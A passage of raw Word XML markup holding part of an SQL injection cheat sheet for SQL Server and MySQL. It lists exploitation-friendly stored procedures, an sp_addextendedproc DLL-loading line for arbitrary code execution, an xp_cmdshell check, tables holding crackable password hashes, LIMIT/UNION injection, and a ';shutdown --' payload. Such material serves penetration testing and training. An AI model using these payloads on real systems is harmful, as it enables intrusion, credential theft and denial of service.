        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_servicecontrol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55780C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Listing storage media: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_availablemedia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB203A" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Listing ODBC resources: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_enumdsn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A402FEF" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Managing the login mode: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_loginconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B95A6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Creating CAB files: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_makecab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28F97E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Listing domains: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_ntsec_enumdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F817BC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Process termination (you need to know the PID): </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_terminate_process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B373A5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Writing an HTML file to a UNC or internal path: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp_makewebtask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40684D72"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You can also use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp_addextendedproc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to add a new procedure, which basically lets you execute arbitrary code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FD358"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>exec xp_webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690BDB5D"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Useful system views in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB7D7E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Error messages: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>master..sysmessages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A042C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Linked servers: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>master..sysservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BEC4B5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Logins and passwords (note that SQL Server 2000 and 2005 both use a similar and crackable algorithm for hashing passwords)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388D1A7D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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SQL Server 2000: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>masters..sysxlogins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DF2DF" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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SQL Server 2005: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.sql_logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B171A"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Handy techniques for further MSSQL exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1FBDE" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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lastRenderedPageBreak/>
        <w:t>Get detailed information about the currently running process:</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SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB828B3" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Check if a command was successful by triggering an error condition depending on the return code:</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DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE2594" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Get the host name of the SQL server:</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HOST_NAME()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF494B5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Check if a user is member of a specific group:</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IS_MEMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (Transact-SQL)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9937B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Checks if a user has a specific role:</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IS_SRVROLEMEMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (Transact-SQL) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BCA93" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Open remote connections to another server:</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OPENDATASOURCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (Transact-SQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OPENROWSET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (Transact-SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B72AAA"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Remember that you cannot use sub-selects in SQL Server </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC9D9D"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SQL injection into LIMIT (M) or ORDER (MSO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667726B"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D394E"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If injecting into the second limit value, you can comment it out or use it in your </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAC3549"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Shut down SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C850417"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This can occasionally be useful. To shut down the database server, inject: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>';shutdown --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FAC6A4"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finding and manipulating the database structure in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A344B7"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Getting user-defined tables (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FF0BB"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Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> system table (older versions) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> view (newer versions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712FE03"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT name FROM sysobjects WHERE xtype = 'U'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7AF41"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT TOP 1 name FROM sys.objects WHERE type = 'U'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB153F"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Getting column names (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AFA6A"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lastRenderedPageBreak/>
        <w:t>Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syscolumns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> system tables (older versions) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> views (newer versions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1576E5"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F067B"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Moving records (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31288DFA"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A very effective technique is to modify </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOT EXIST</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> clause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB7BDF"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>... WHERE users NOT IN ('First User', 'Second User')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C01DD"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69504BD5"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Or you can resort to some dirty tricks for column enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A0E55"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
